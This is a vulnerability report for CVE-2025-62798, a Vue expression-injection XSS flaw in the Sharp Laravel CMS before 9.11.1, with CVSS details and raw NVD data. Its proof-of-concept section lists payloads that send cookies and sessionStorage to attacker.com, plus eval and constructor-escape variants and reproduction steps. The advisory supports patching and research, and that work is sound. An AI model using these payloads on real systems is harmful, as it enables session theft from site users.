Security Vulnerability Report
CVE-2025-62798 CVSS 5.4 MEDIUM

CVE-2025-62798

Published: 2025-10-28 21:15:41
Last Modified: 2026-04-15 00:35:42

Description

Sharp is a content management framework built for Laravel as a package. Prior to 9.11.1, a Cross-Site Scripting (XSS) vulnerability was discovered in code16/sharp when rendering content using the SharpShowTextField component. In affected versions, expressions wrapped in {{ and }} were evaluated by Vue. This allowed attackers to inject arbitrary JavaScript or HTML that executes in the browser when the field is displayed. The issue has been fixed in v9.11.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Weakness
CWE-79

Configurations (Affected Products)


code16/sharp < 9.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CVE-2025-62798 XSS PoC for Sharp Framework -->
<!-- Attack Vector: Inject malicious Vue expression in SharpShowTextField -->

<!-- Malicious Payload to steal cookies -->
{{window.location='https://attacker.com/steal?c='+document.cookie}}

<!-- Alternative Payload - Execute arbitrary JS -->
{{eval(atob('YWxlcnQoJ3hzc2NpZGluZycpOw=='))}}

<!-- Steal session data -->
{{fetch('https://attacker.com/log?data='+btoa(JSON.stringify(sessionStorage)))}}

<!-- HTML Injection variant -->
{{$refs.x}} or {{constructor.constructor('alert(1)')()}}

<!-- Reproduction Steps: -->
<!-- 1. Navigate to SharpShowTextField in admin panel -->
<!-- 2. Input any of the above payloads in text field -->
<!-- 3. Save and view the page where this field is displayed -->
<!-- 4. Observe JavaScript execution in victim's browser -->
```

References

https://github.com/code16/sharp/pull/654
https://github.com/code16/sharp/releases/tag/v9.11.1
https://github.com/code16/sharp/security/advisories/GHSA-9f58-4465-23c7

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-62798",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-28T21:15:40.913",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Sharp is a content management framework built for Laravel as a package. Prior to 9.11.1, a Cross-Site Scripting (XSS) vulnerability was discovered in code16/sharp when rendering content using the SharpShowTextField component. In affected versions, expressions wrapped in {{ & }} were evaluated by Vue. This allowed attackers to inject arbitrary JavaScript or HTML that executes in the browser when the field is displayed. The issue has been fixed in v9.11.1 ."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "references": [
      { "url": "https://github.com/code16/sharp/pull/654", "source": "[email protected]" },
      { "url": "https://github.com/code16/sharp/releases/tag/v9.11.1", "source": "[email protected]" },
      { "url": "https://github.com/code16/sharp/security/advisories/GHSA-9f58-4465-23c7", "source": "[email protected]" }
    ]
  }
}
```